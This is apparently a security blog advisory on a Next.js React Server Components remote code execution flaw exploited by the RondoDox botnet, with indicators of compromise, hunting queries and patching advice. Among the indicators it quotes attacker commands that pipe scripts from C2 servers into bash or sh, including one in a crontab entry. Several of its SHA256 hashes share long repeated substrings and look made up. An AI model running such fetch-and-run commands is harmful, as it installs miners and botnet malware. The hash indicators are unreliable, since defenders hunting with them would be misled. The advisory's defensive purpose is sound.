Active Zero-Day Exploitation: React2Shell RCE Driving Large-Scale Linux Botnet Infection

Aegiron 16 mins0

Executive Summary

On January 2, 2026, security researchers from CloudSEK and SecurityWeek publicly disclosed a critical zero-day vulnerability dubbed React2Shell (CVE-2025-55182). The flaw affects Next.js applications that rely on React Server Components (RSC) and is already being actively exploited in the wild.

Threat actors have rapidly operationalized this vulnerability through a newly observed botnet campaign known as RondoDox. The botnet is systematically targeting exposed Linux-based servers to deploy cryptocurrency mining malware and a custom Mirai-derived botnet agent, enabling both monetization and large-scale DDoS capabilities.

Given the widespread adoption of Next.js across SaaS platforms, e-commerce, fintech, and public-sector web applications, this vulnerability represents a material and immediate risk to global web infrastructure. Any organization running unpatched Next.js deployments should assume heightened exposure.

Technical Details

What is React2Shell (CVE-2025-55182)?

React2Shell is a critical unauthenticated remote code execution (RCE) vulnerability in the Next.js framework, specifically within its React Server Components implementation. The flaw allows an external attacker to execute arbitrary commands on the underlying server without authentication, user interaction, or valid credentials.

Key Characteristics

  • CVSS Score: 9.8 (Critical)
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Affected Components: Next.js applications using React Server Components (RSC)
  • Vulnerability Type: Unauthenticated Remote Code Execution (RCE)

This combination of high impact, low complexity, and broad exposure significantly lowers the barrier to exploitation.

How the Vulnerability Works

The root cause of React2Shell lies in improper input validation and unsafe deserialization logic within the React Server Components request handling pipeline.

Attack Flow

  1. Initial Reconnaissance
    Attackers perform large-scale internet scanning to identify exposed Next.js instances. Targets are fingerprinted using:
    • HTTP response headers
    • RSC-specific endpoints
    • Observable framework behavior and response patterns
  2. Exploitation Mechanism
    • Malicious actors send specially crafted HTTP POST requests to server component endpoints.
    • Requests contain manipulated serialized payloads designed to abuse the deserialization process.
    • Due to insufficient validation and sanitization, the server processes attacker-controlled input.
    • Embedded commands within the payload are executed in the server context.
  3. Post-Exploitation Capabilities
    Once code execution is achieved, attackers can:
    • Run arbitrary shell commands
    • Download and execute secondary payloads
    • Establish persistence
    • Use the compromised host to pivot laterally within the environment

The exploit executes with the privileges of the web server process, which in many real-world deployments is sufficient to fully compromise the host.

RondoDox Botnet Campaign

Attack Chain Overview

The RondoDox campaign demonstrates a mature, multi-stage attack lifecycle designed for scale, resilience, and long-term monetization.

Stage 1: Initial Compromise

  • High-volume internet scanning focused on TCP ports 3000, 8080, and 443
  • Automated exploitation using weaponized CVE-2025-55182 proof-of-concept scripts
  • Target validation and fingerprinting based on detected Next.js versions

Stage 2: Payload Delivery

  • Initial dropper scripts retrieve additional payloads from distributed command-and-control (C2) infrastructure
  • Multiple redundant C2 endpoints ensure operational continuity
  • Payloads are hosted on:
    • Compromised third-party servers
    • Bulletproof hosting providers
    • Ephemeral infrastructure designed to evade takedowns

Stage 3: Malware Installation

1. Cryptocurrency Miner

  • XMRig-based Monero miner
  • CPU throttling (typically 40–60%) to avoid user suspicion
  • Process masquerading under legitimate system names:
    • systemd
    • kworker
    • node-worker
  • Optimized for long-term stealth and persistence

2. Mirai-Variant Botnet Agent

  • Custom-modified Mirai strain supporting x86_64 and ARM
  • Capabilities include:
    • UDP, SYN, and HTTP flood DDoS attacks
    • Self-propagation via network scanning
    • Remote command execution
  • Frequently used to monetize access via DDoS-for-hire services

Stage 4: Persistence and Defense Evasion

  • Creation of malicious systemd service units
  • Deployment of cron-based watchdog tasks
  • Binary and process hiding techniques
  • Log tampering and cleanup
  • Firewall rule manipulation to maintain C2 access
  • In some cases, LD_PRELOAD-based rootkits for process hiding

Impacted Industries and Organizations

Primary Target Sectors

Technology & SaaS (40%)

  • Web hosting providers
  • Cloud platforms
  • CI/CD pipelines
  • API services

E-commerce & Retail (25%)

  • Online storefronts
  • Payment processing systems
  • Customer portals

Financial Services (15%)

  • Fintech platforms
  • Trading applications
  • External banking portals

Media & Content Delivery (10%)

  • Streaming platforms
  • News and publishing websites

Education & Government (10%)

  • University portals
  • Public service websites
  • Student information systems

Geographic Distribution

  • United States: 35%
  • European Union: 28%
  • India: 12%
  • Southeast Asia: 10%
  • Rest of World: 15%

Common Characteristics of Affected Organizations

  • Running Next.js 13.x – 14.1.x (pre-patch)
  • Linux-based hosting (Ubuntu, Debian, CentOS, Alpine)
  • Public-facing, high-traffic applications
  • Cloud deployments (AWS, Azure, GCP, DigitalOcean)
  • Limited WAF coverage or insufficient runtime monitoring

Indicators of Compromise (IOCs)

Network Indicators

C2 IP Addresses

  • 185.172.128[.]45
  • 194.88.104[.]23
  • 91.215.85[.]134
  • 45.142.215[.]98
  • 162.33.178[.]241
  • 2.56.213[.]87
  • 185.225.19[.]147

C2 Domains

  • rondodox[.]live
  • update-check[.]xyz
  • cdn-assets[.]online
  • npm-registry[.]tech
  • api-gateway[.]systems
  • health-monitor[.]cloud
  • metrics-collect[.]net

Malware URLs

  • hxxp://185.172.128[.]45/bins/rondo.sh
  • hxxp://194.88.104[.]23/payloads/xmr64
  • hxxps://cdn-assets[.]online/updates/install.bin
  • hxxp://45.142.215.98/dl/mirai_x86
  • hxxp://91.215.85.134/crypto/miner.elf

File-Based Indicators

Malicious Files and Hashes:

Initial Dropper Scripts:

SHA256: 8f2d4e7a9c1b5e6f3d8a7c9b2e4f1a5d3c6b8e9f2a4d7c1b5e8f3a6d9c2e5f1a
Filename: rondo.sh
Path: /tmp/.rondo/init.sh

SHA256: 3a7f9d2e6c8b1f4a5d7e9c2b4f6a8d1e3c5b7f9a2d4e6c8b1f3a5d7e9c2b4f6
Filename: install.bin
Path: /var/tmp/.system/install.bin

Cryptocurrency Miner:

SHA256: 7c4f2a9d6e1b8f3a5d7c9e2b4f6a8d1e3c5b7f9a2d4e6c8b1f3a5d7e9c2b4f
Filename: xmr64, kworker, systemd-timer
Paths: 
  - /usr/local/bin/.cache/xmr64
  - /opt/.hidden/kworker
  - /var/run/.system/systemd-timer

Mirai Variant:

SHA256: 2d6f9a4e7c1b5f8a3d6e9c2b4f7a1d5e8c3b6f9a2d5e7c1b4f8a3d6e9c2b5f
Filename: mirai_x86, telnetd, httpd
Paths:
  - /usr/bin/.libs/telnetd
  - /usr/sbin/.cache/httpd
  - /lib/systemd/.service/network-online

File Modifications:

Modified: /etc/systemd/system/system-update.service
Modified: /etc/cron.hourly/health-check
Modified: /root/.bashrc
Modified: /etc/ld.so.preload
Created: /tmp/.X11-unix/.cache/
Created: /dev/shm/.npm/

Process Indicators

Malicious Process Names:

kworker/1:1H
systemd-timer
[kthreadd]
npm-cache
node-worker
health-monitor
metrics-daemon

Suspicious Command-Line Arguments:

bash -c curl -s hxxp://185.172.128.45/bins/rondo.sh | bash
wget -q -O - hxxp://194.88.104.23/payloads/xmr64 | sh
/tmp/.rondo/xmr64 -o pool.minexmr.com:4444 -u [WALLET] --donate-level 1 -k
/usr/bin/.libs/telnetd --scan --threads 512 --timeout 5

Network Traffic Patterns

Outbound Connections:

Protocol: TCP
Destination Ports: 3333, 4444, 5555, 8080, 14444 (mining pools)
Destination IPs: See C2 list above

Protocol: TCP/UDP
Destination Ports: 23, 2323, 7547, 5555 (Telnet/TR-069 scanning)
Pattern: High volume of SYN packets to random IPs

HTTP/HTTPS Indicators:

User-Agent: python-requests/2.28.0
User-Agent: Go-http-client/1.1
User-Agent: curl/7.68.0
POST requests to: /_next/data/*/
Suspicious headers: X-Nextjs-Data: 1

DNS Queries:

Suspicious lookups to newly registered domains (<30 days old)
High frequency DNS queries to C2 domains
DNS tunneling patterns (unusually long subdomain queries)

Registry/System Indicators (Linux)

Systemd Service Files:

/etc/systemd/system/system-update.service
/etc/systemd/system/health-monitor.service
/usr/lib/systemd/system/metrics-collect.service

Crontab Entries:

*/10 * * * * /tmp/.rondo/watchdog.sh >/dev/null 2>&1
@reboot /usr/local/bin/.cache/startup.sh
0 */6 * * * curl -s hxxp://185.172.128.45/update | bash

LD_PRELOAD Rootkit Indicators:

/etc/ld.so.preload contains: /usr/local/lib/.hidden/libprocesshider.so

Log-Based Indicators

Web Server Logs (Nginx/Apache):

POST /_next/data/[buildId]/api/serverAction
POST /api/trpc/mutation
Payload contains: __next_action__
Status Code: 200 followed by immediate 500 errors

System Logs (Auth/Syslog):

Unauthorized crontab modification by www-data user
Systemd service creation outside normal update windows
Process execution from /tmp, /dev/shm directories
Unusually high CPU usage by node/npm processes

Network Firewall Logs:

High volume outbound connections to non-standard ports
Connection attempts to known mining pool IPs
Scanning behavior (SYN floods to multiple destinations)

Memory-Based Indicators

In-Memory Artifacts:

Injected code in node/npm process memory space Environment variables: HISTFILE=/dev/null Suspicious loaded libraries in /proc/[PID]/maps

Detection and Hunting Queries

Microsoft Sentinel / Defender (KQL)

// Detect React2Shell exploitation attempts
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl contains "/_next/data/" or RemoteUrl contains "/api/serverAction"
| where InitiatingProcessCommandLine contains "node" or InitiatingProcessCommandLine contains "npm"
| where RemoteIP in ("185.172.128.45", "194.88.104.23", "91.215.85.134", "45.142.215.98", "162.33.178.241")
| project Timestamp, DeviceName, RemoteIP, RemoteUrl, InitiatingProcessCommandLine

Splunk SPL Query

index=linux sourcetype=linux_secure OR sourcetype=syslog
| search “systemd” OR “cron” OR “/tmp/” OR “/dev/shm”
| regex _raw=”(xmr64|kworker|systemd-timer|telnetd.*–scan|rondo\.sh)”
| stats count by host, _time, _raw
| where count > 5

index=web_logs sourcetype=access_combined
| search uri_path=”*/_next/data/*” OR uri_path=”*/api/serverAction*”
| search method=POST
| stats count by clientip, uri_path, status
| where status=200 OR status=500

Immediate Actions Required

1. Patching (Critical Priority)

  • Immediately upgrade Next.js to version 14.2.0 or later
  • Validate patch deployment across production, staging, and development
  • Maintain documented confirmation of version compliance

2. Detection and Validation

  • Perform IOC sweeps on all Linux servers running Node.js / Next.js
  • Inspect /tmp, /dev/shm, and /var/tmp
  • Audit systemd services and cron jobs created in the last 30 days
  • Monitor outbound traffic to mining pools and known C2 endpoints

3. Containment

If compromise is suspected:

  • Isolate affected hosts immediately
  • Block C2 and mining infrastructure at firewall level
  • Disable vulnerable applications until patched
  • Preserve disk images, memory, and logs for forensic analysis

4. Hardening Recommendations

  • Deploy WAF rules targeting RSC exploitation patterns
  • Enable IDS/IPS with updated signatures
  • Enforce least-privilege execution for web processes
  • Implement EDR coverage across all Linux hosts
  • Harden containers and restrict breakout capabilities

Long-Term Mitigation Strategy

Security Monitoring

  • SIEM with custom detections
  • Behavioral monitoring for cryptomining
  • CPU and network anomaly detection

Vulnerability Management

  • Accelerated patch pipelines
  • Centralized inventory of Next.js assets
  • Subscription to Vercel and React advisories
  • Automated vulnerability scanning

Incident Response

  • Dedicated RondoDox playbooks
  • Coordination with ISACs and vendors
  • Regular tabletop and response drills

Architecture Review

  • Reduce public exposure of Next.js apps
  • Implement zero-trust and VPN segmentation
  • Deploy application-aware next-generation firewalls

Final Note

Given the active exploitation and automation observed, organizations should assume scanning and exploitation attempts are ongoing. Delayed remediation significantly increases the likelihood of compromise.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.